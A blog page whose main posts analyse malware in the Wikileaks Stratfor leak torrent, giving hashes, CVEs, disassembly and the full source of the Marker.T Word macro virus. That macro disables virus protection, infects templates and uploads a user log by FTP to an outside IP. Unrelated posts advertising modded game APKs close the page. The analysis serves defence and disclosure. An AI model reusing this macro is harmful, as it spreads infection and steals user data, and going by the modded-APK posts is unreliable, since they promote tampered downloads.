Tuesday, March 31, 2015

Wikileaks Malware Analysis Continued

Yesterday I released a blog post in which I explained that at least one Wikileaks property, wlstorage.net, is distributing a series of malicious programs as part of a torrent file dump related to the Global Intelligence Files retrieved from Stratfor by Jeremy Hammond and several others.

I am slowly going through the malicious files in order to better understand what they are attempting to do. The work primarily involves extracting Visual Basic macros and OBE structures from documents, disassembling executables that are thus scraped from the payload document. Even for files using well documented exploits, as many of these files are, this is slow-going and tedious work that I invite readers experienced in security research to contact me about to offer assistance.

One such executable retrieved from the Stratfor files is gifiles-2014\gifiles\attach\151\151784_Command.com. As with the files reviewed yesterday, this was retrieved from the gifiles-2014.tar.gz.torrent file downloaded from wlstorage.net, which resides on the same servers as wikileaks.org. I have disassembled this executable using Heaven Tools' PE Explorer and Hex-Rays IDA. Accordingly I have determined that the file contains a variant of the Magistr worm. However, this version seems to have a number of unique features that I have not seen in the literature concerning Magistr (NOTE there are numerous versions of this worm, and this one has likely been seen before by someone).

The program makes use of the following DLL's to call its various functions:

KERNEL32.dll
USER32.dll
COMCTL32.dll
WININET.dll
cmpbk32.dll
cmutil.dll

The program adds an entry for itself in the Microsoft Connection Manager Phone Books and uses that entry to establish both FTP and HTTP connections. I am still working on where the connections head to.
Josh Wieder, Wikileaks, Global Intelligence Files, malware, MSCM Phone Book
The program loads the MSCM Phone Book
Josh Wieder, Wikileaks, Global Intelligence Files, FTP, Connection Manager
Connection Manager is used to establish an FTP connection and transfer files
Josh Wieder, Wikileaks, Global Intelligence Files, malware, HTTP Connections
HTTP connections are established as well
The malicious program appears to pass itself of as a program called iPassConnect by creating references to the following:

PBUPDATE.PBD
PBUPDATE.EXE
PBUPDATE.INF
PBUPDATE.VER

Here is one such reference:

Josh Wieder, Wikileaks, Global Intelligence Files, iPassConnect, PBUPDATE,EXE
PBUPDATE.EXE is associated with iPassConnect
I will continue the testing of this application and update this post when I nail down where these connections are going to.

I am more than happy to share more comprehensive information concerning my research, so feel free to email me if you would like to help out.

I have also contacted Wikileaks (to the best of my ability) to warn them of the dangerous files being distributed on wlstorage.net. For a number of reasons they are not the easiest people to get ahold of, particularly in relation to technical issues, and I do not know anyone directly affiliated with the group. If someone reading this post does have a more direct means of communication with Wikileaks, please provide them with this information ASAP!

Monday, March 30, 2015

Wikileaks Global Intelligence File Dump is Loaded With Malicious Software

Click here for the second post on this topic, which includes more detailed technical information.

Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.

In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.

This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.

Beginning in February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc (more widely known as Stratfor). The leak publication began with 200 emails, with Wikileaks progressively publishing more and more emails through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was published.

The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegnur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreward in an attempt to explain the history of the documents; which is still contested.)

It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office New York during the nine month period that the #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents include reference to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.

The content of the emails, though of obvious political and social significance, is not relevant to our post here. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak contain malicious files that are designed to, among other things, retrieve detailed information about the computers which have downloaded them and send them to a variety of remote systems. 

My research at this time is still in progress, however given the wide circulation of this data & the apparent lack of notification of the danger in these files has convinced me to publish what little I have found immediately. 

I ought to be clear from the outset: I have no information linking Wikileaks, Asssange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files or who have already downloaded these files understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files it would be a bonus.

The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain wlstorage.net. While the domains are separate, the wlstorage.net is linked directly from the Wikileak Global Intelligence Files web page (at https://wikileaks.org/gifiles), the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users to download the malicious files.


# host wikileaks.org
wikileaks.org has address 195.35.109.53
wikileaks.org has address 91.218.114.210
wikileaks.org has address 91.218.244.152
wikileaks.org has address 95.211.113.131
wikileaks.org has address 95.211.113.154
wikileaks.org has address 195.35.109.44
wikileaks.org mail is handled by 1 mx.wikileaks.org.

# host wlstorage.net
wlstorage.net has address 91.218.114.210
wlstorage.net has address 91.218.244.152
wlstorage.net has address 95.211.113.131
wlstorage.net has address 95.211.113.154
wlstorage.net has address 195.35.109.44
wlstorage.net has address 195.35.109.53

Josh Wieder, Wikileaks, Global Intelligence Files
The Wikileaks.Org Global Intelligence Files web page
Josh Wieder, Wikileaks, Global Intelligence Files, wlstorage.net, torrent
The link to wlstorage.net from Wikileaks
The link to wlstorage.net points to a list of torrent files. As mentioned previously, Wikileaks began with a small initial leak of documents, and released progressively more documents. Each of these torrents is a different version of the leak, which over time grew to include more and more files as they were apparently reviewed by the Wikileaks team. Notice that the very last torrent uses a different compression method and file nomenclature than the rest of the torrents. It is this very last file, and this file only, that I have identified malware inside of.
Josh Wieder, Wikileaks, Global Intelligence Files, Torrent, index page
The Global Intelligence Files torrent files on wlstorage.net
The SSL Certificate for both domains is the same:
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA
subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org
notBefore=Oct 14 00:00:00 2013 GMT
notAfter=Oct 14 23:59:59 2015 GMT
00b5f826
SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32

# echo |\
> openssl s_client -connect wikileaks.org:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB
MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k
aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5
WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT
G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh
a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS
gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL
u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo
hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j
tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS
TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco
NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ
EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE
AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6
Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM
AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp
U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito
dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG
AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp
bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh
e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn
uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9
ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX
fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc
tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr
ElIzcmpt7JexUF8K
-----END CERTIFICATE-----


echo |\
> openssl s_client -connect wlstorage.net:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB
MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k
aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5
WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT
G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh
a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS
gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL
u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo
hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j
tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS
TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco
NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ
EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE
AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6
Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM
AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp
U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito
dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG
AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp
bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh
e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn
uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9
ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX
fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc
tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr
ElIzcmpt7JexUF8K
-----END CERTIFICATE-----

I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z & gifiles-2014.tar.bz2. I was unable to identify any malware in 20121104151320.7z - which is notable for a number of reasons. Each of these files is massive - gifiles-20121104151320.7z is close to 3GB while compressed. However, gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different encryption scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except for gifiles-2014.tar.bz2 - which uses Tar and BZip, used commonly in Windows & Linux. Its reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions. 

I've identified the following exploits being used:


MARKER.T 
CVE-2006-2492
CVE-2009-0557
CVE-2011-0611
CVE-2010-3333
HEAPSPRAY
Mydoom
Magistr
Pdfjsc.BP
Wordjmp.gen
Mimail

The software vulnerable to these exploits is (version omitted while research is in progress): 

Adobe Acrobat
Adobe Flash Player
ActiveX
Microsoft Office
Microsoft Office for Mac
Open XML File Format Converter

These exploits are contained in the following files:

gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc
gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc
gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc
gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf
gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls
gifiles-2014\gifiles\attach\117\117687_Lithium.doc
gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc
gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc
gifiles-2014\gifiles\attach\47\47247_US Congress re.doc
gifiles-2014\gifiles\attach\47\47329_US Congress re.doc
gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf
gifiles-2014\gifiles\attach\151\151784_Command.com
gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip)
gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe
gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc
gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip)
gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe
gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip)
gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe
gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf

These attachments are just phishing nonsense and dont contain malicious software but if you scan this dump with an antivirus they may cause a positive:

gifiles-2014\gifiles\docs\34\3485657_your-friend-cj-saw-miniture-tesla-generator-in-action-live.html
gifiles-2014\gifiles\attach\20\20497_PP-001-460-891-520.html

I have been working on extracting the payloads from the .DOC files first before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 17793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:

117687_Lithium.doc
md5 6451dc0fc47122e75e3af66c9547d420
sha1 88eaf2aaa211d761c190d310d181f9f4e8d3853b
sha256 34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2

17793_Hybrid write-up.doc
md5 87114142e32fd455b525c900e4342475
sha1 cfda55de190f6b71434b4a4b66b2a372773133db
sha256 9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358

117870_Hybrid write-up2.doc
md5 6fde4a58f42deba3613030cbb93aef2b
sha1 07191e232304f3c7853e18916bb89f8af4cda3b1
sha256 32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655

Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
  End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
  'Infect the NormalTemplate
  If DocumentInfected = True Then
    SaveNormalTemplate = NormalTemplate.Saved
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
      'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i
    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    If SaveNormalTemplate = True Then NormalTemplate.Save
  End If
  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
    SaveDocument = ActiveDocument.Saved
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    If SaveDocument = True Then ActiveDocument.Save
  End If
End If
End Sub

We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 209.201.88.110, which looks like it is assigned to a Vietnamese restaurant in New Jersey.

Using OfficeMalScanner provides further information:


[*] SCAN mode selected
[*] Opening file 117870_Hybrid write-up2.doc
[*] Filesize is 604672 (0x93a00) Bytes
[*] Ms Office OLE2 Compound Format document detected
[*] Scanning now...
             +++++ decryption loop detected at offset: 0x00019eb8 +++++


33C9 xor ecx, ecx
E7EE out EEh, eax
2974E835 sub [eax+ebp*8+35h], esi
79F7 jns $-07h
34A2 xor al, A2h
12F5 adc dh, ch
72F7 jb $-07h
94 xchg esp, eax
BA0EE6EEA9 mov edx, A9EEE60Eh
7909 jns $+0Bh
E615 out 15h, al
774F jnbe $+51h
51 push ecx
B42F mov ah, 2Fh
EE out dx, al
9E sahf 
--------------------------------------------------------------------------


Brute-forcing for encrypted PE- and embedded OLE-files now...
Bruting XOR Key: 0x01
....
Analysis finished!

------------------------------------------------------------------------
117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10
------------------------------------------------------------------------

There appears to be an additional payload in these files that is encrypted, in addition to the VBScript macro that sits on top. Uncovering it will take me a bit more time.

In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension, this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit: CVE-2010-3333.

md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38

This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:

-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com] 
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest


Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below.  Article appeared as a straight Q and A story, everything reads balanced and fair.  Please let me know if you have any questions or concerns.

V/r,
Courtney

The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.


Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.

Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.

I've been working on reverse engineering this code as well. This file does not contain VBScript macros. The most interesting tidbit I have found apart from what is already well-documented about this exploit was recovered by scraping a bit of the shell code using this Python script (Javascript needs to be enabled to see the github embed, or you can view it here instead - the extraction script was provided by Alexander Hanel, though Mr Hanel did not collaborate on this project):


This is what was recovered (another github embed that can be viewed here for those who don't trust someone else's javascript):



I am still in the process of investigating this however I am particularly interested in the creation of an executable, C:\a.exe as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:

"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."

At this point very little conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified as infected with malware here as part of their coverage of these document leaks. It is possible, for example, to search and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few precautions are taken by the end user, who expect this content to be sanitized before it is provided to them by a media organization.

When downloading and viewing these files, most are attempting to protect themselves from surveillance; things like NSA's XKEYSCORE. Few users are expecting the leaked files themselves to be a threat. While there is overlap between the sort of security precautions that would protect a computer against outside surveillance and infected files, there are significant differences. For example, if air gapping can be an effective deterrent against surveillance and some of the worst features of malware. However, the threat from surveillance is often considered transitory. After performing the task which needs to be protected from prying eyes, a user might not find it unreasonable to break their airgap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a network-available computer. All such activity are easily exploited by malicious software. To use a somewhat related analogy - Tor won't protect you from a keylogger.

This is why notification of malicious software in these files is important: so users can adjust their operational security plans to adjust for it.

There are a number of theories that could account for the presence of this malicious software. Perhaps the least-wildeyed of those theories is that Statfor employees were receiving these malicious files through email. Whether or not those employees did anything with those malicious files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012).

That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.

This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" are of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.

The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using Virus Total, and a significant number of anti-virus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (I tested using roughly 70 antivirus programs) detected malicious software. Some files were only detected by 15 antivirus programs.

One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.

NOTE: my second post on this on this topic is online, and contains further malware analysis.

Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.

NEW UPDATED Asphalt 8 Airborne v.1.8.0i Apk+Data (Unlimited Money/Anti-Ban)

NEW UPDATED Asphalt 8 Airborne v.1.8.0i Apk+Data (Unlimited Money/Anti-Ban)
Asphalt  8 Screenshot

Description
*****LEAVE GRAVITY IN THE DUST *****
The best Android arcade racing game series reaches a new turning point! Perform dynamic, high-speed aerial stunts in an intense driving experience powered by a brand-new physics engine!
LUXURY DREAM CARS 
• 56 high-performance cars (80% of them NEW!)
• Top licensed manufacturers and models like Lamborghini Veneno, Bugatti Veyron, Ferrari FXX and Pagani Zonda R
• Newly recorded high-fidelity car motor sounds for realistic audio immersion.
GET AIRBORNE
• Hit the ramps and take the race above
• Perform barrel rolls and wild 360º jumps 
• Maneuver through the air, pulling stunts while racing
NEW EXOTIC LOCATIONS
• Race in 9 different settings like Venice, French Guiana, Iceland, the Nevada Desert and other exciting locations! 
• All tracks available in original and mirror variations in Career mode. 
• Discover plenty of hidden shortcuts
NEW FEATURES FOR SPEED FREAKS
• 8 seasons & 180 events in Career mode
• Stunning visuals thanks to next-gen shaders, real time geometry reflection & other amazing effects for a new simulation of speed!
• A detailed damage system like nothing you’ve seen before
• Check out the new Infected and Drift Gate game modes
SIMULTANEOUS MULTIPLAYER & GHOST CHALLENGES
•Simultaneous multiplayer action for up to 8 real opponents! 
•Dare friends to asynchronous races in your favourite cars
•Compare scores on the new leaderboards with friends and drivers around the world
•Share your racing achievements and prove that you’re the ultimate speed machine.
MUSIC TO REV YOUR SOUL
•A heart-thumping mix of amazing licensed music for your game
•Featuring real tracks from Bloc Party, Mutemath & The Crystal Method!
A game for fans of extreme arcade racing, with real dream cars and phenomenal graphics that will also please racing simulation enthusiasts.
Asphalt 8: Airborne is now MOGA Enhanced! Available at major retailers, carrier stores and online on the MOGAanywhere website.

What’s New
Discover the latest Asphalt 8 update and its amazing new features!
• CAR DECALS: Customise your cars & take down your opponents with style!
• 5 NEW FERRARI CARS: Get ready for these Italian stallions, including the Enzo Ferrari, Ferrari 612 Scaglietti, Ferrari 330 P4, Ferrari F40 & Ferrari F50, coming soon!
• GARAGE REDESIGN: Admire your beauties in an all-new environment!
• NEW CAR COLLECTION: Time to stock your garage & get exclusive rewards!
Requires Android: 2.3 and Up




ORIGINAL APK
[CLICKHERE]
OBB FILES
[CLICKHERE]

MODED APK
[CLICKHERE]


Friday, March 27, 2015

[3-27-15] Samurai II: Vengeance 1.1.4 Mod Apk (Unli Money)

[3-27-15] Samurai II: Vengeance 1.1.4 Mod Apk (Unli Money)

Description
Samurai: Way of the Warrior was featured in Best Games of 2009 by Apple – Samurai II is a true successor, aided by over a year of focused development. Overall production values and vicious action put Samurai II on par with console 3D brawlers. Screenshots don’t do Samurai II justice – the fluid action has to be seen running at 60 frames per second.
But looks alone won’t carry a game – the developers listened to fan feedback and improved gameplay throughout. With a new virtual d-pad, dynamic camera, environmental puzzles, traps, and vicious new enemies, Samurai II is brand new experience for hack ‘n’ slash gamers on the go.
